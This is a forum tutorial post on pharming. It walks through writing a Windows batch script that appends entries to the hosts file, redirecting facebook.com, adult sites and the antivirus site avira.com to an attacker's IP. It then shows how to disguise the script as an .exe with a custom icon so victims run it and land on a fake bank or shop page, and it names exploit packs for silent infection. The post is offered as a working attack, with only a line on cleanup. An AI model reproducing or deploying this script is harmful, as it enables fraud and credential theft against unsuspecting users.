Forum Thread: Pharming .Attacking the Websites of Banks or E-Commerce Sites. By Mohamed Ahmed

i will give u a definition from google, then put my touch

What is pharming?

Pharming (pronounced 'farming') is a form of online fraud very similar to phishing as pharmers rely upon the same bogus websites and theft of confidential information. However, where phishing must entice a user to the website through 'bait' in the form of a phony email or link, pharming re-directs victims to the bogus site even if the victim has typed the correct web address. This is often applied to the websites of banks or e-commerce sites.

Now that we know it's pharming and then phising we proceed to act this wil be our first lesson so i will exolain just first and small technique .

Materials
The notepad
Some icon pack
Converter .bat to .exe (it's a batch file compiler)

Now the first thing we will do is open the notepad and write:

@echo off
echo 72.9.233.146 facebook.com >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 xnxx.com >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 xvideos.com >> %windir%\system32\drivers\etc\hosts
echo 72.9.233.146 avira.com >> %windir%\system32\drivers\etc\hosts
exit

Let's explain a little: ip address
72.8.2323.147 any any thing

will be the ip of your hosting where they have your bank scam or whatever (with ip of your hosting I mean a hosting with dedicated ip not that they pinged your web page and ready and I have my ip because that is not so ), then that ip change it for yours, in this case I put the ip of the web page of a game.

The web page that in this case we put

facebook.com - xnxx.com - xvideos.com - avira.com

will be the web pages that our victims will enter and will be redirected to our scam.
And the route
%windir%\system32\drivers\etc\hosts

what it does is to call the hosts file that is in the directory of
windows > system32 > drivers > etc

so add those lines to the hosts file.

Now let's leave explanations and let's get to the point: Now we click on save as and put any name but with the extension .bat for example (file.bat) and we leave now we open our converter .bat to .exe and compile our file so that it is in .exe and if you want to change the icon from the same compiler and with this we open finished, now we provide: execute our file.exe file and see that nothing happened to the naked eye but now go to the following path WINDOWS \ system32 \ drivers \ etc and open the hosts file with the notepad and they will see our `s and IP`S URLs in that file and that means that it works (when they run their file.exe the hosts file will be modified, and to disinfect just open the hosts file and delete our `s and IP`S URLs that were added and left the default ip 127.0.0.1 and the localhost name) or simply open a new internet window and write one of the web addresses that said in the file, such asxnxx.com and you will see that they will be redirected to the ip (72.9.233.146) which is a web page of a game, and if they look at the URL well they will realize that nothing changes because it will say the same of http://www.xnxx .com that is why these attacks are so effective hehe, and for those who think big on the net there are several scripts to infect PC`S silently as the fire pack lite, ice pack among others.

it was posted by us before in another forum .

Never Miss a Hacking or Security Guide

Get new Null Byte guides every week.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active